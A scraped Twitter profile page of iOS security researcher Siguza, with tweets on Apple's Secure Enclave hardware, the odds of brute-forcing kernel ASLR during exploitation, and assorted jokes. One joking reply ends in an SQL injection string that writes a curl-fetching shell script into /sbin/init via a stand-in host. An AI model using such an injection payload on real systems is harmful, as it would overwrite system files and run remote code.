Twitter | Search | |
Siguza
iOS hacker & full-blood shitposter. Sometimes RE tools and jailbreak author. 0days for life. Contact in English or German, please. PGP:
9,415
Tweets
175
Following
36,325
Followers
Tweets
Siguza retweeted
~ 18h
sock_port in JSC, because why the fuck not (also fuck C++) /cc
Reply Retweet Like
Siguza retweeted
Liz Rice 🇪🇺 23h
Ok this is terrifying - I have just logged in to sheets and I’m in someone else’s account. I have never heard of the person, but they’re called Jose. Any Googlers in my follows can help me report this effectively?
Reply Retweet Like
Siguza Feb 16
Replying to @never_released
What? hdiutil shows HFS dmgs as "KernelSupport: No", but last time I tried, I could mount them...
Reply Retweet Like
Siguza retweeted
Ben Jenkins Feb 14
Hear me out on this. Limewire Festival. Bands from the early 2000s play mislabeled songs that aren’t actually theirs, tickets available as a .exe with a 70% chance of destroying your computer.
Reply Retweet Like
Siguza Feb 15
So on a certain level it does use TrustZone technology... but it uses only some aspects, combined with a lot of proprietary stuff. If you're feeling undyingly curious, there's a boatload of patents on stuff surrounding the Secure Enclave: .
Reply Retweet Like
Siguza Feb 15
..., it has its own data and firmware hardware encryption keys, ... and probably a few things that don't come to my mind right now. Also, on A10(X) and earlier it's a 32-bit KingFisher core, but on A11 and later it's a 64-bit Apple one, the same architecture as the AP.
Reply Retweet Like
Siguza Feb 15
And there are various other bits where the SEP is hardened, e.g. the debug registers are inaccessible, it has its own "JTAG allowed" flag in hardware, it can only be powered up once via the power manager and after that its power controls become inaccessible from the AP side, ...
Reply Retweet Like
Siguza Feb 15
Apple refers to that as "TZ1", at least on the memory controller level. And the portion of DRAM allocated to the SEP is labelled "TZ0", however SEP is a whole separate CPU, complete with its own BootROM, firmware verification, and hardware-backed memory encryption.
Reply Retweet Like
Siguza Feb 15
This is gonna get a bit long. So, the Application Processor on Apple's A10 and later only has EL0 and EL1, which are hardwired to non-secure state. The A9(X) and earlier do have EL3 and the whole "Secure World", which, as I understand it, constitute a "normal TrustZone".
Reply Retweet Like
Siguza Feb 15
Not to mention the fact, this is *with* tfp0. Try brute-guessing ASLR as part of an exploit, lol.
Reply Retweet Like
Siguza Feb 15
That's just plain wrong though. The kernel is about 33MB. *If you're lucky*, you will hit mapped memory after it. Every now and then there's some page tables. But go and do a full dump of the kernel page table hierarchy. Stare into those huge voids between mapped memory yourself.
Reply Retweet Like
Siguza Feb 15
Replying to @Joshbal4 @LucidBrot
- Yes - No - Maybe - I don't know - I don't understand the question - NULL - undefined - '; SELECT '#!/bin/bash\n$(curl http://get.rekt)' INTO OUTFILE '/sbin/init'; --
Reply Retweet Like
Siguza Feb 15
Suppose a panic + reboot + running the exploit again takes 15s. That would put the average expected time to run the exploit & successfully guess the slide at just under 4 days. And that's 50%. The same success rate as empty_list.
Reply Retweet Like
Siguza Feb 15
Wtf do you mean. If you guess wrong, you panic. I had a quick look at 13.3 iBoot, and it seems to allow 32768 different slides. So on one attempt, chance of failure = 1 - 1/32768. To get the chance of failure <50%, you'd need roughly 23'000 attempts: (1-1/32768)^23000 = 0.4956.
Reply Retweet Like
Siguza retweeted
Guille Feb 14
Reply Retweet Like
Siguza retweeted
Shahar Tal Feb 15
A 1000 times this.
Reply Retweet Like
Siguza retweeted
Longhorn Feb 15
- “I’m a full stack engineer” - “Did you get any kind of itsec training?” - “No I did not” Something that I hear way too often…
Reply Retweet Like
Siguza Feb 15
Replying to @LucidBrot
DontDisableCounterAntiSpyware
Reply Retweet Like
Siguza retweeted
Saumil Shah 🇮🇳 Feb 15
Nothing is as “full stack” as security. You get to play at every abstraction layer.
Reply Retweet Like
Siguza retweeted
Dahlia Adler Feb 13
This review is the creepiest horror story I have ever read.
Reply Retweet Like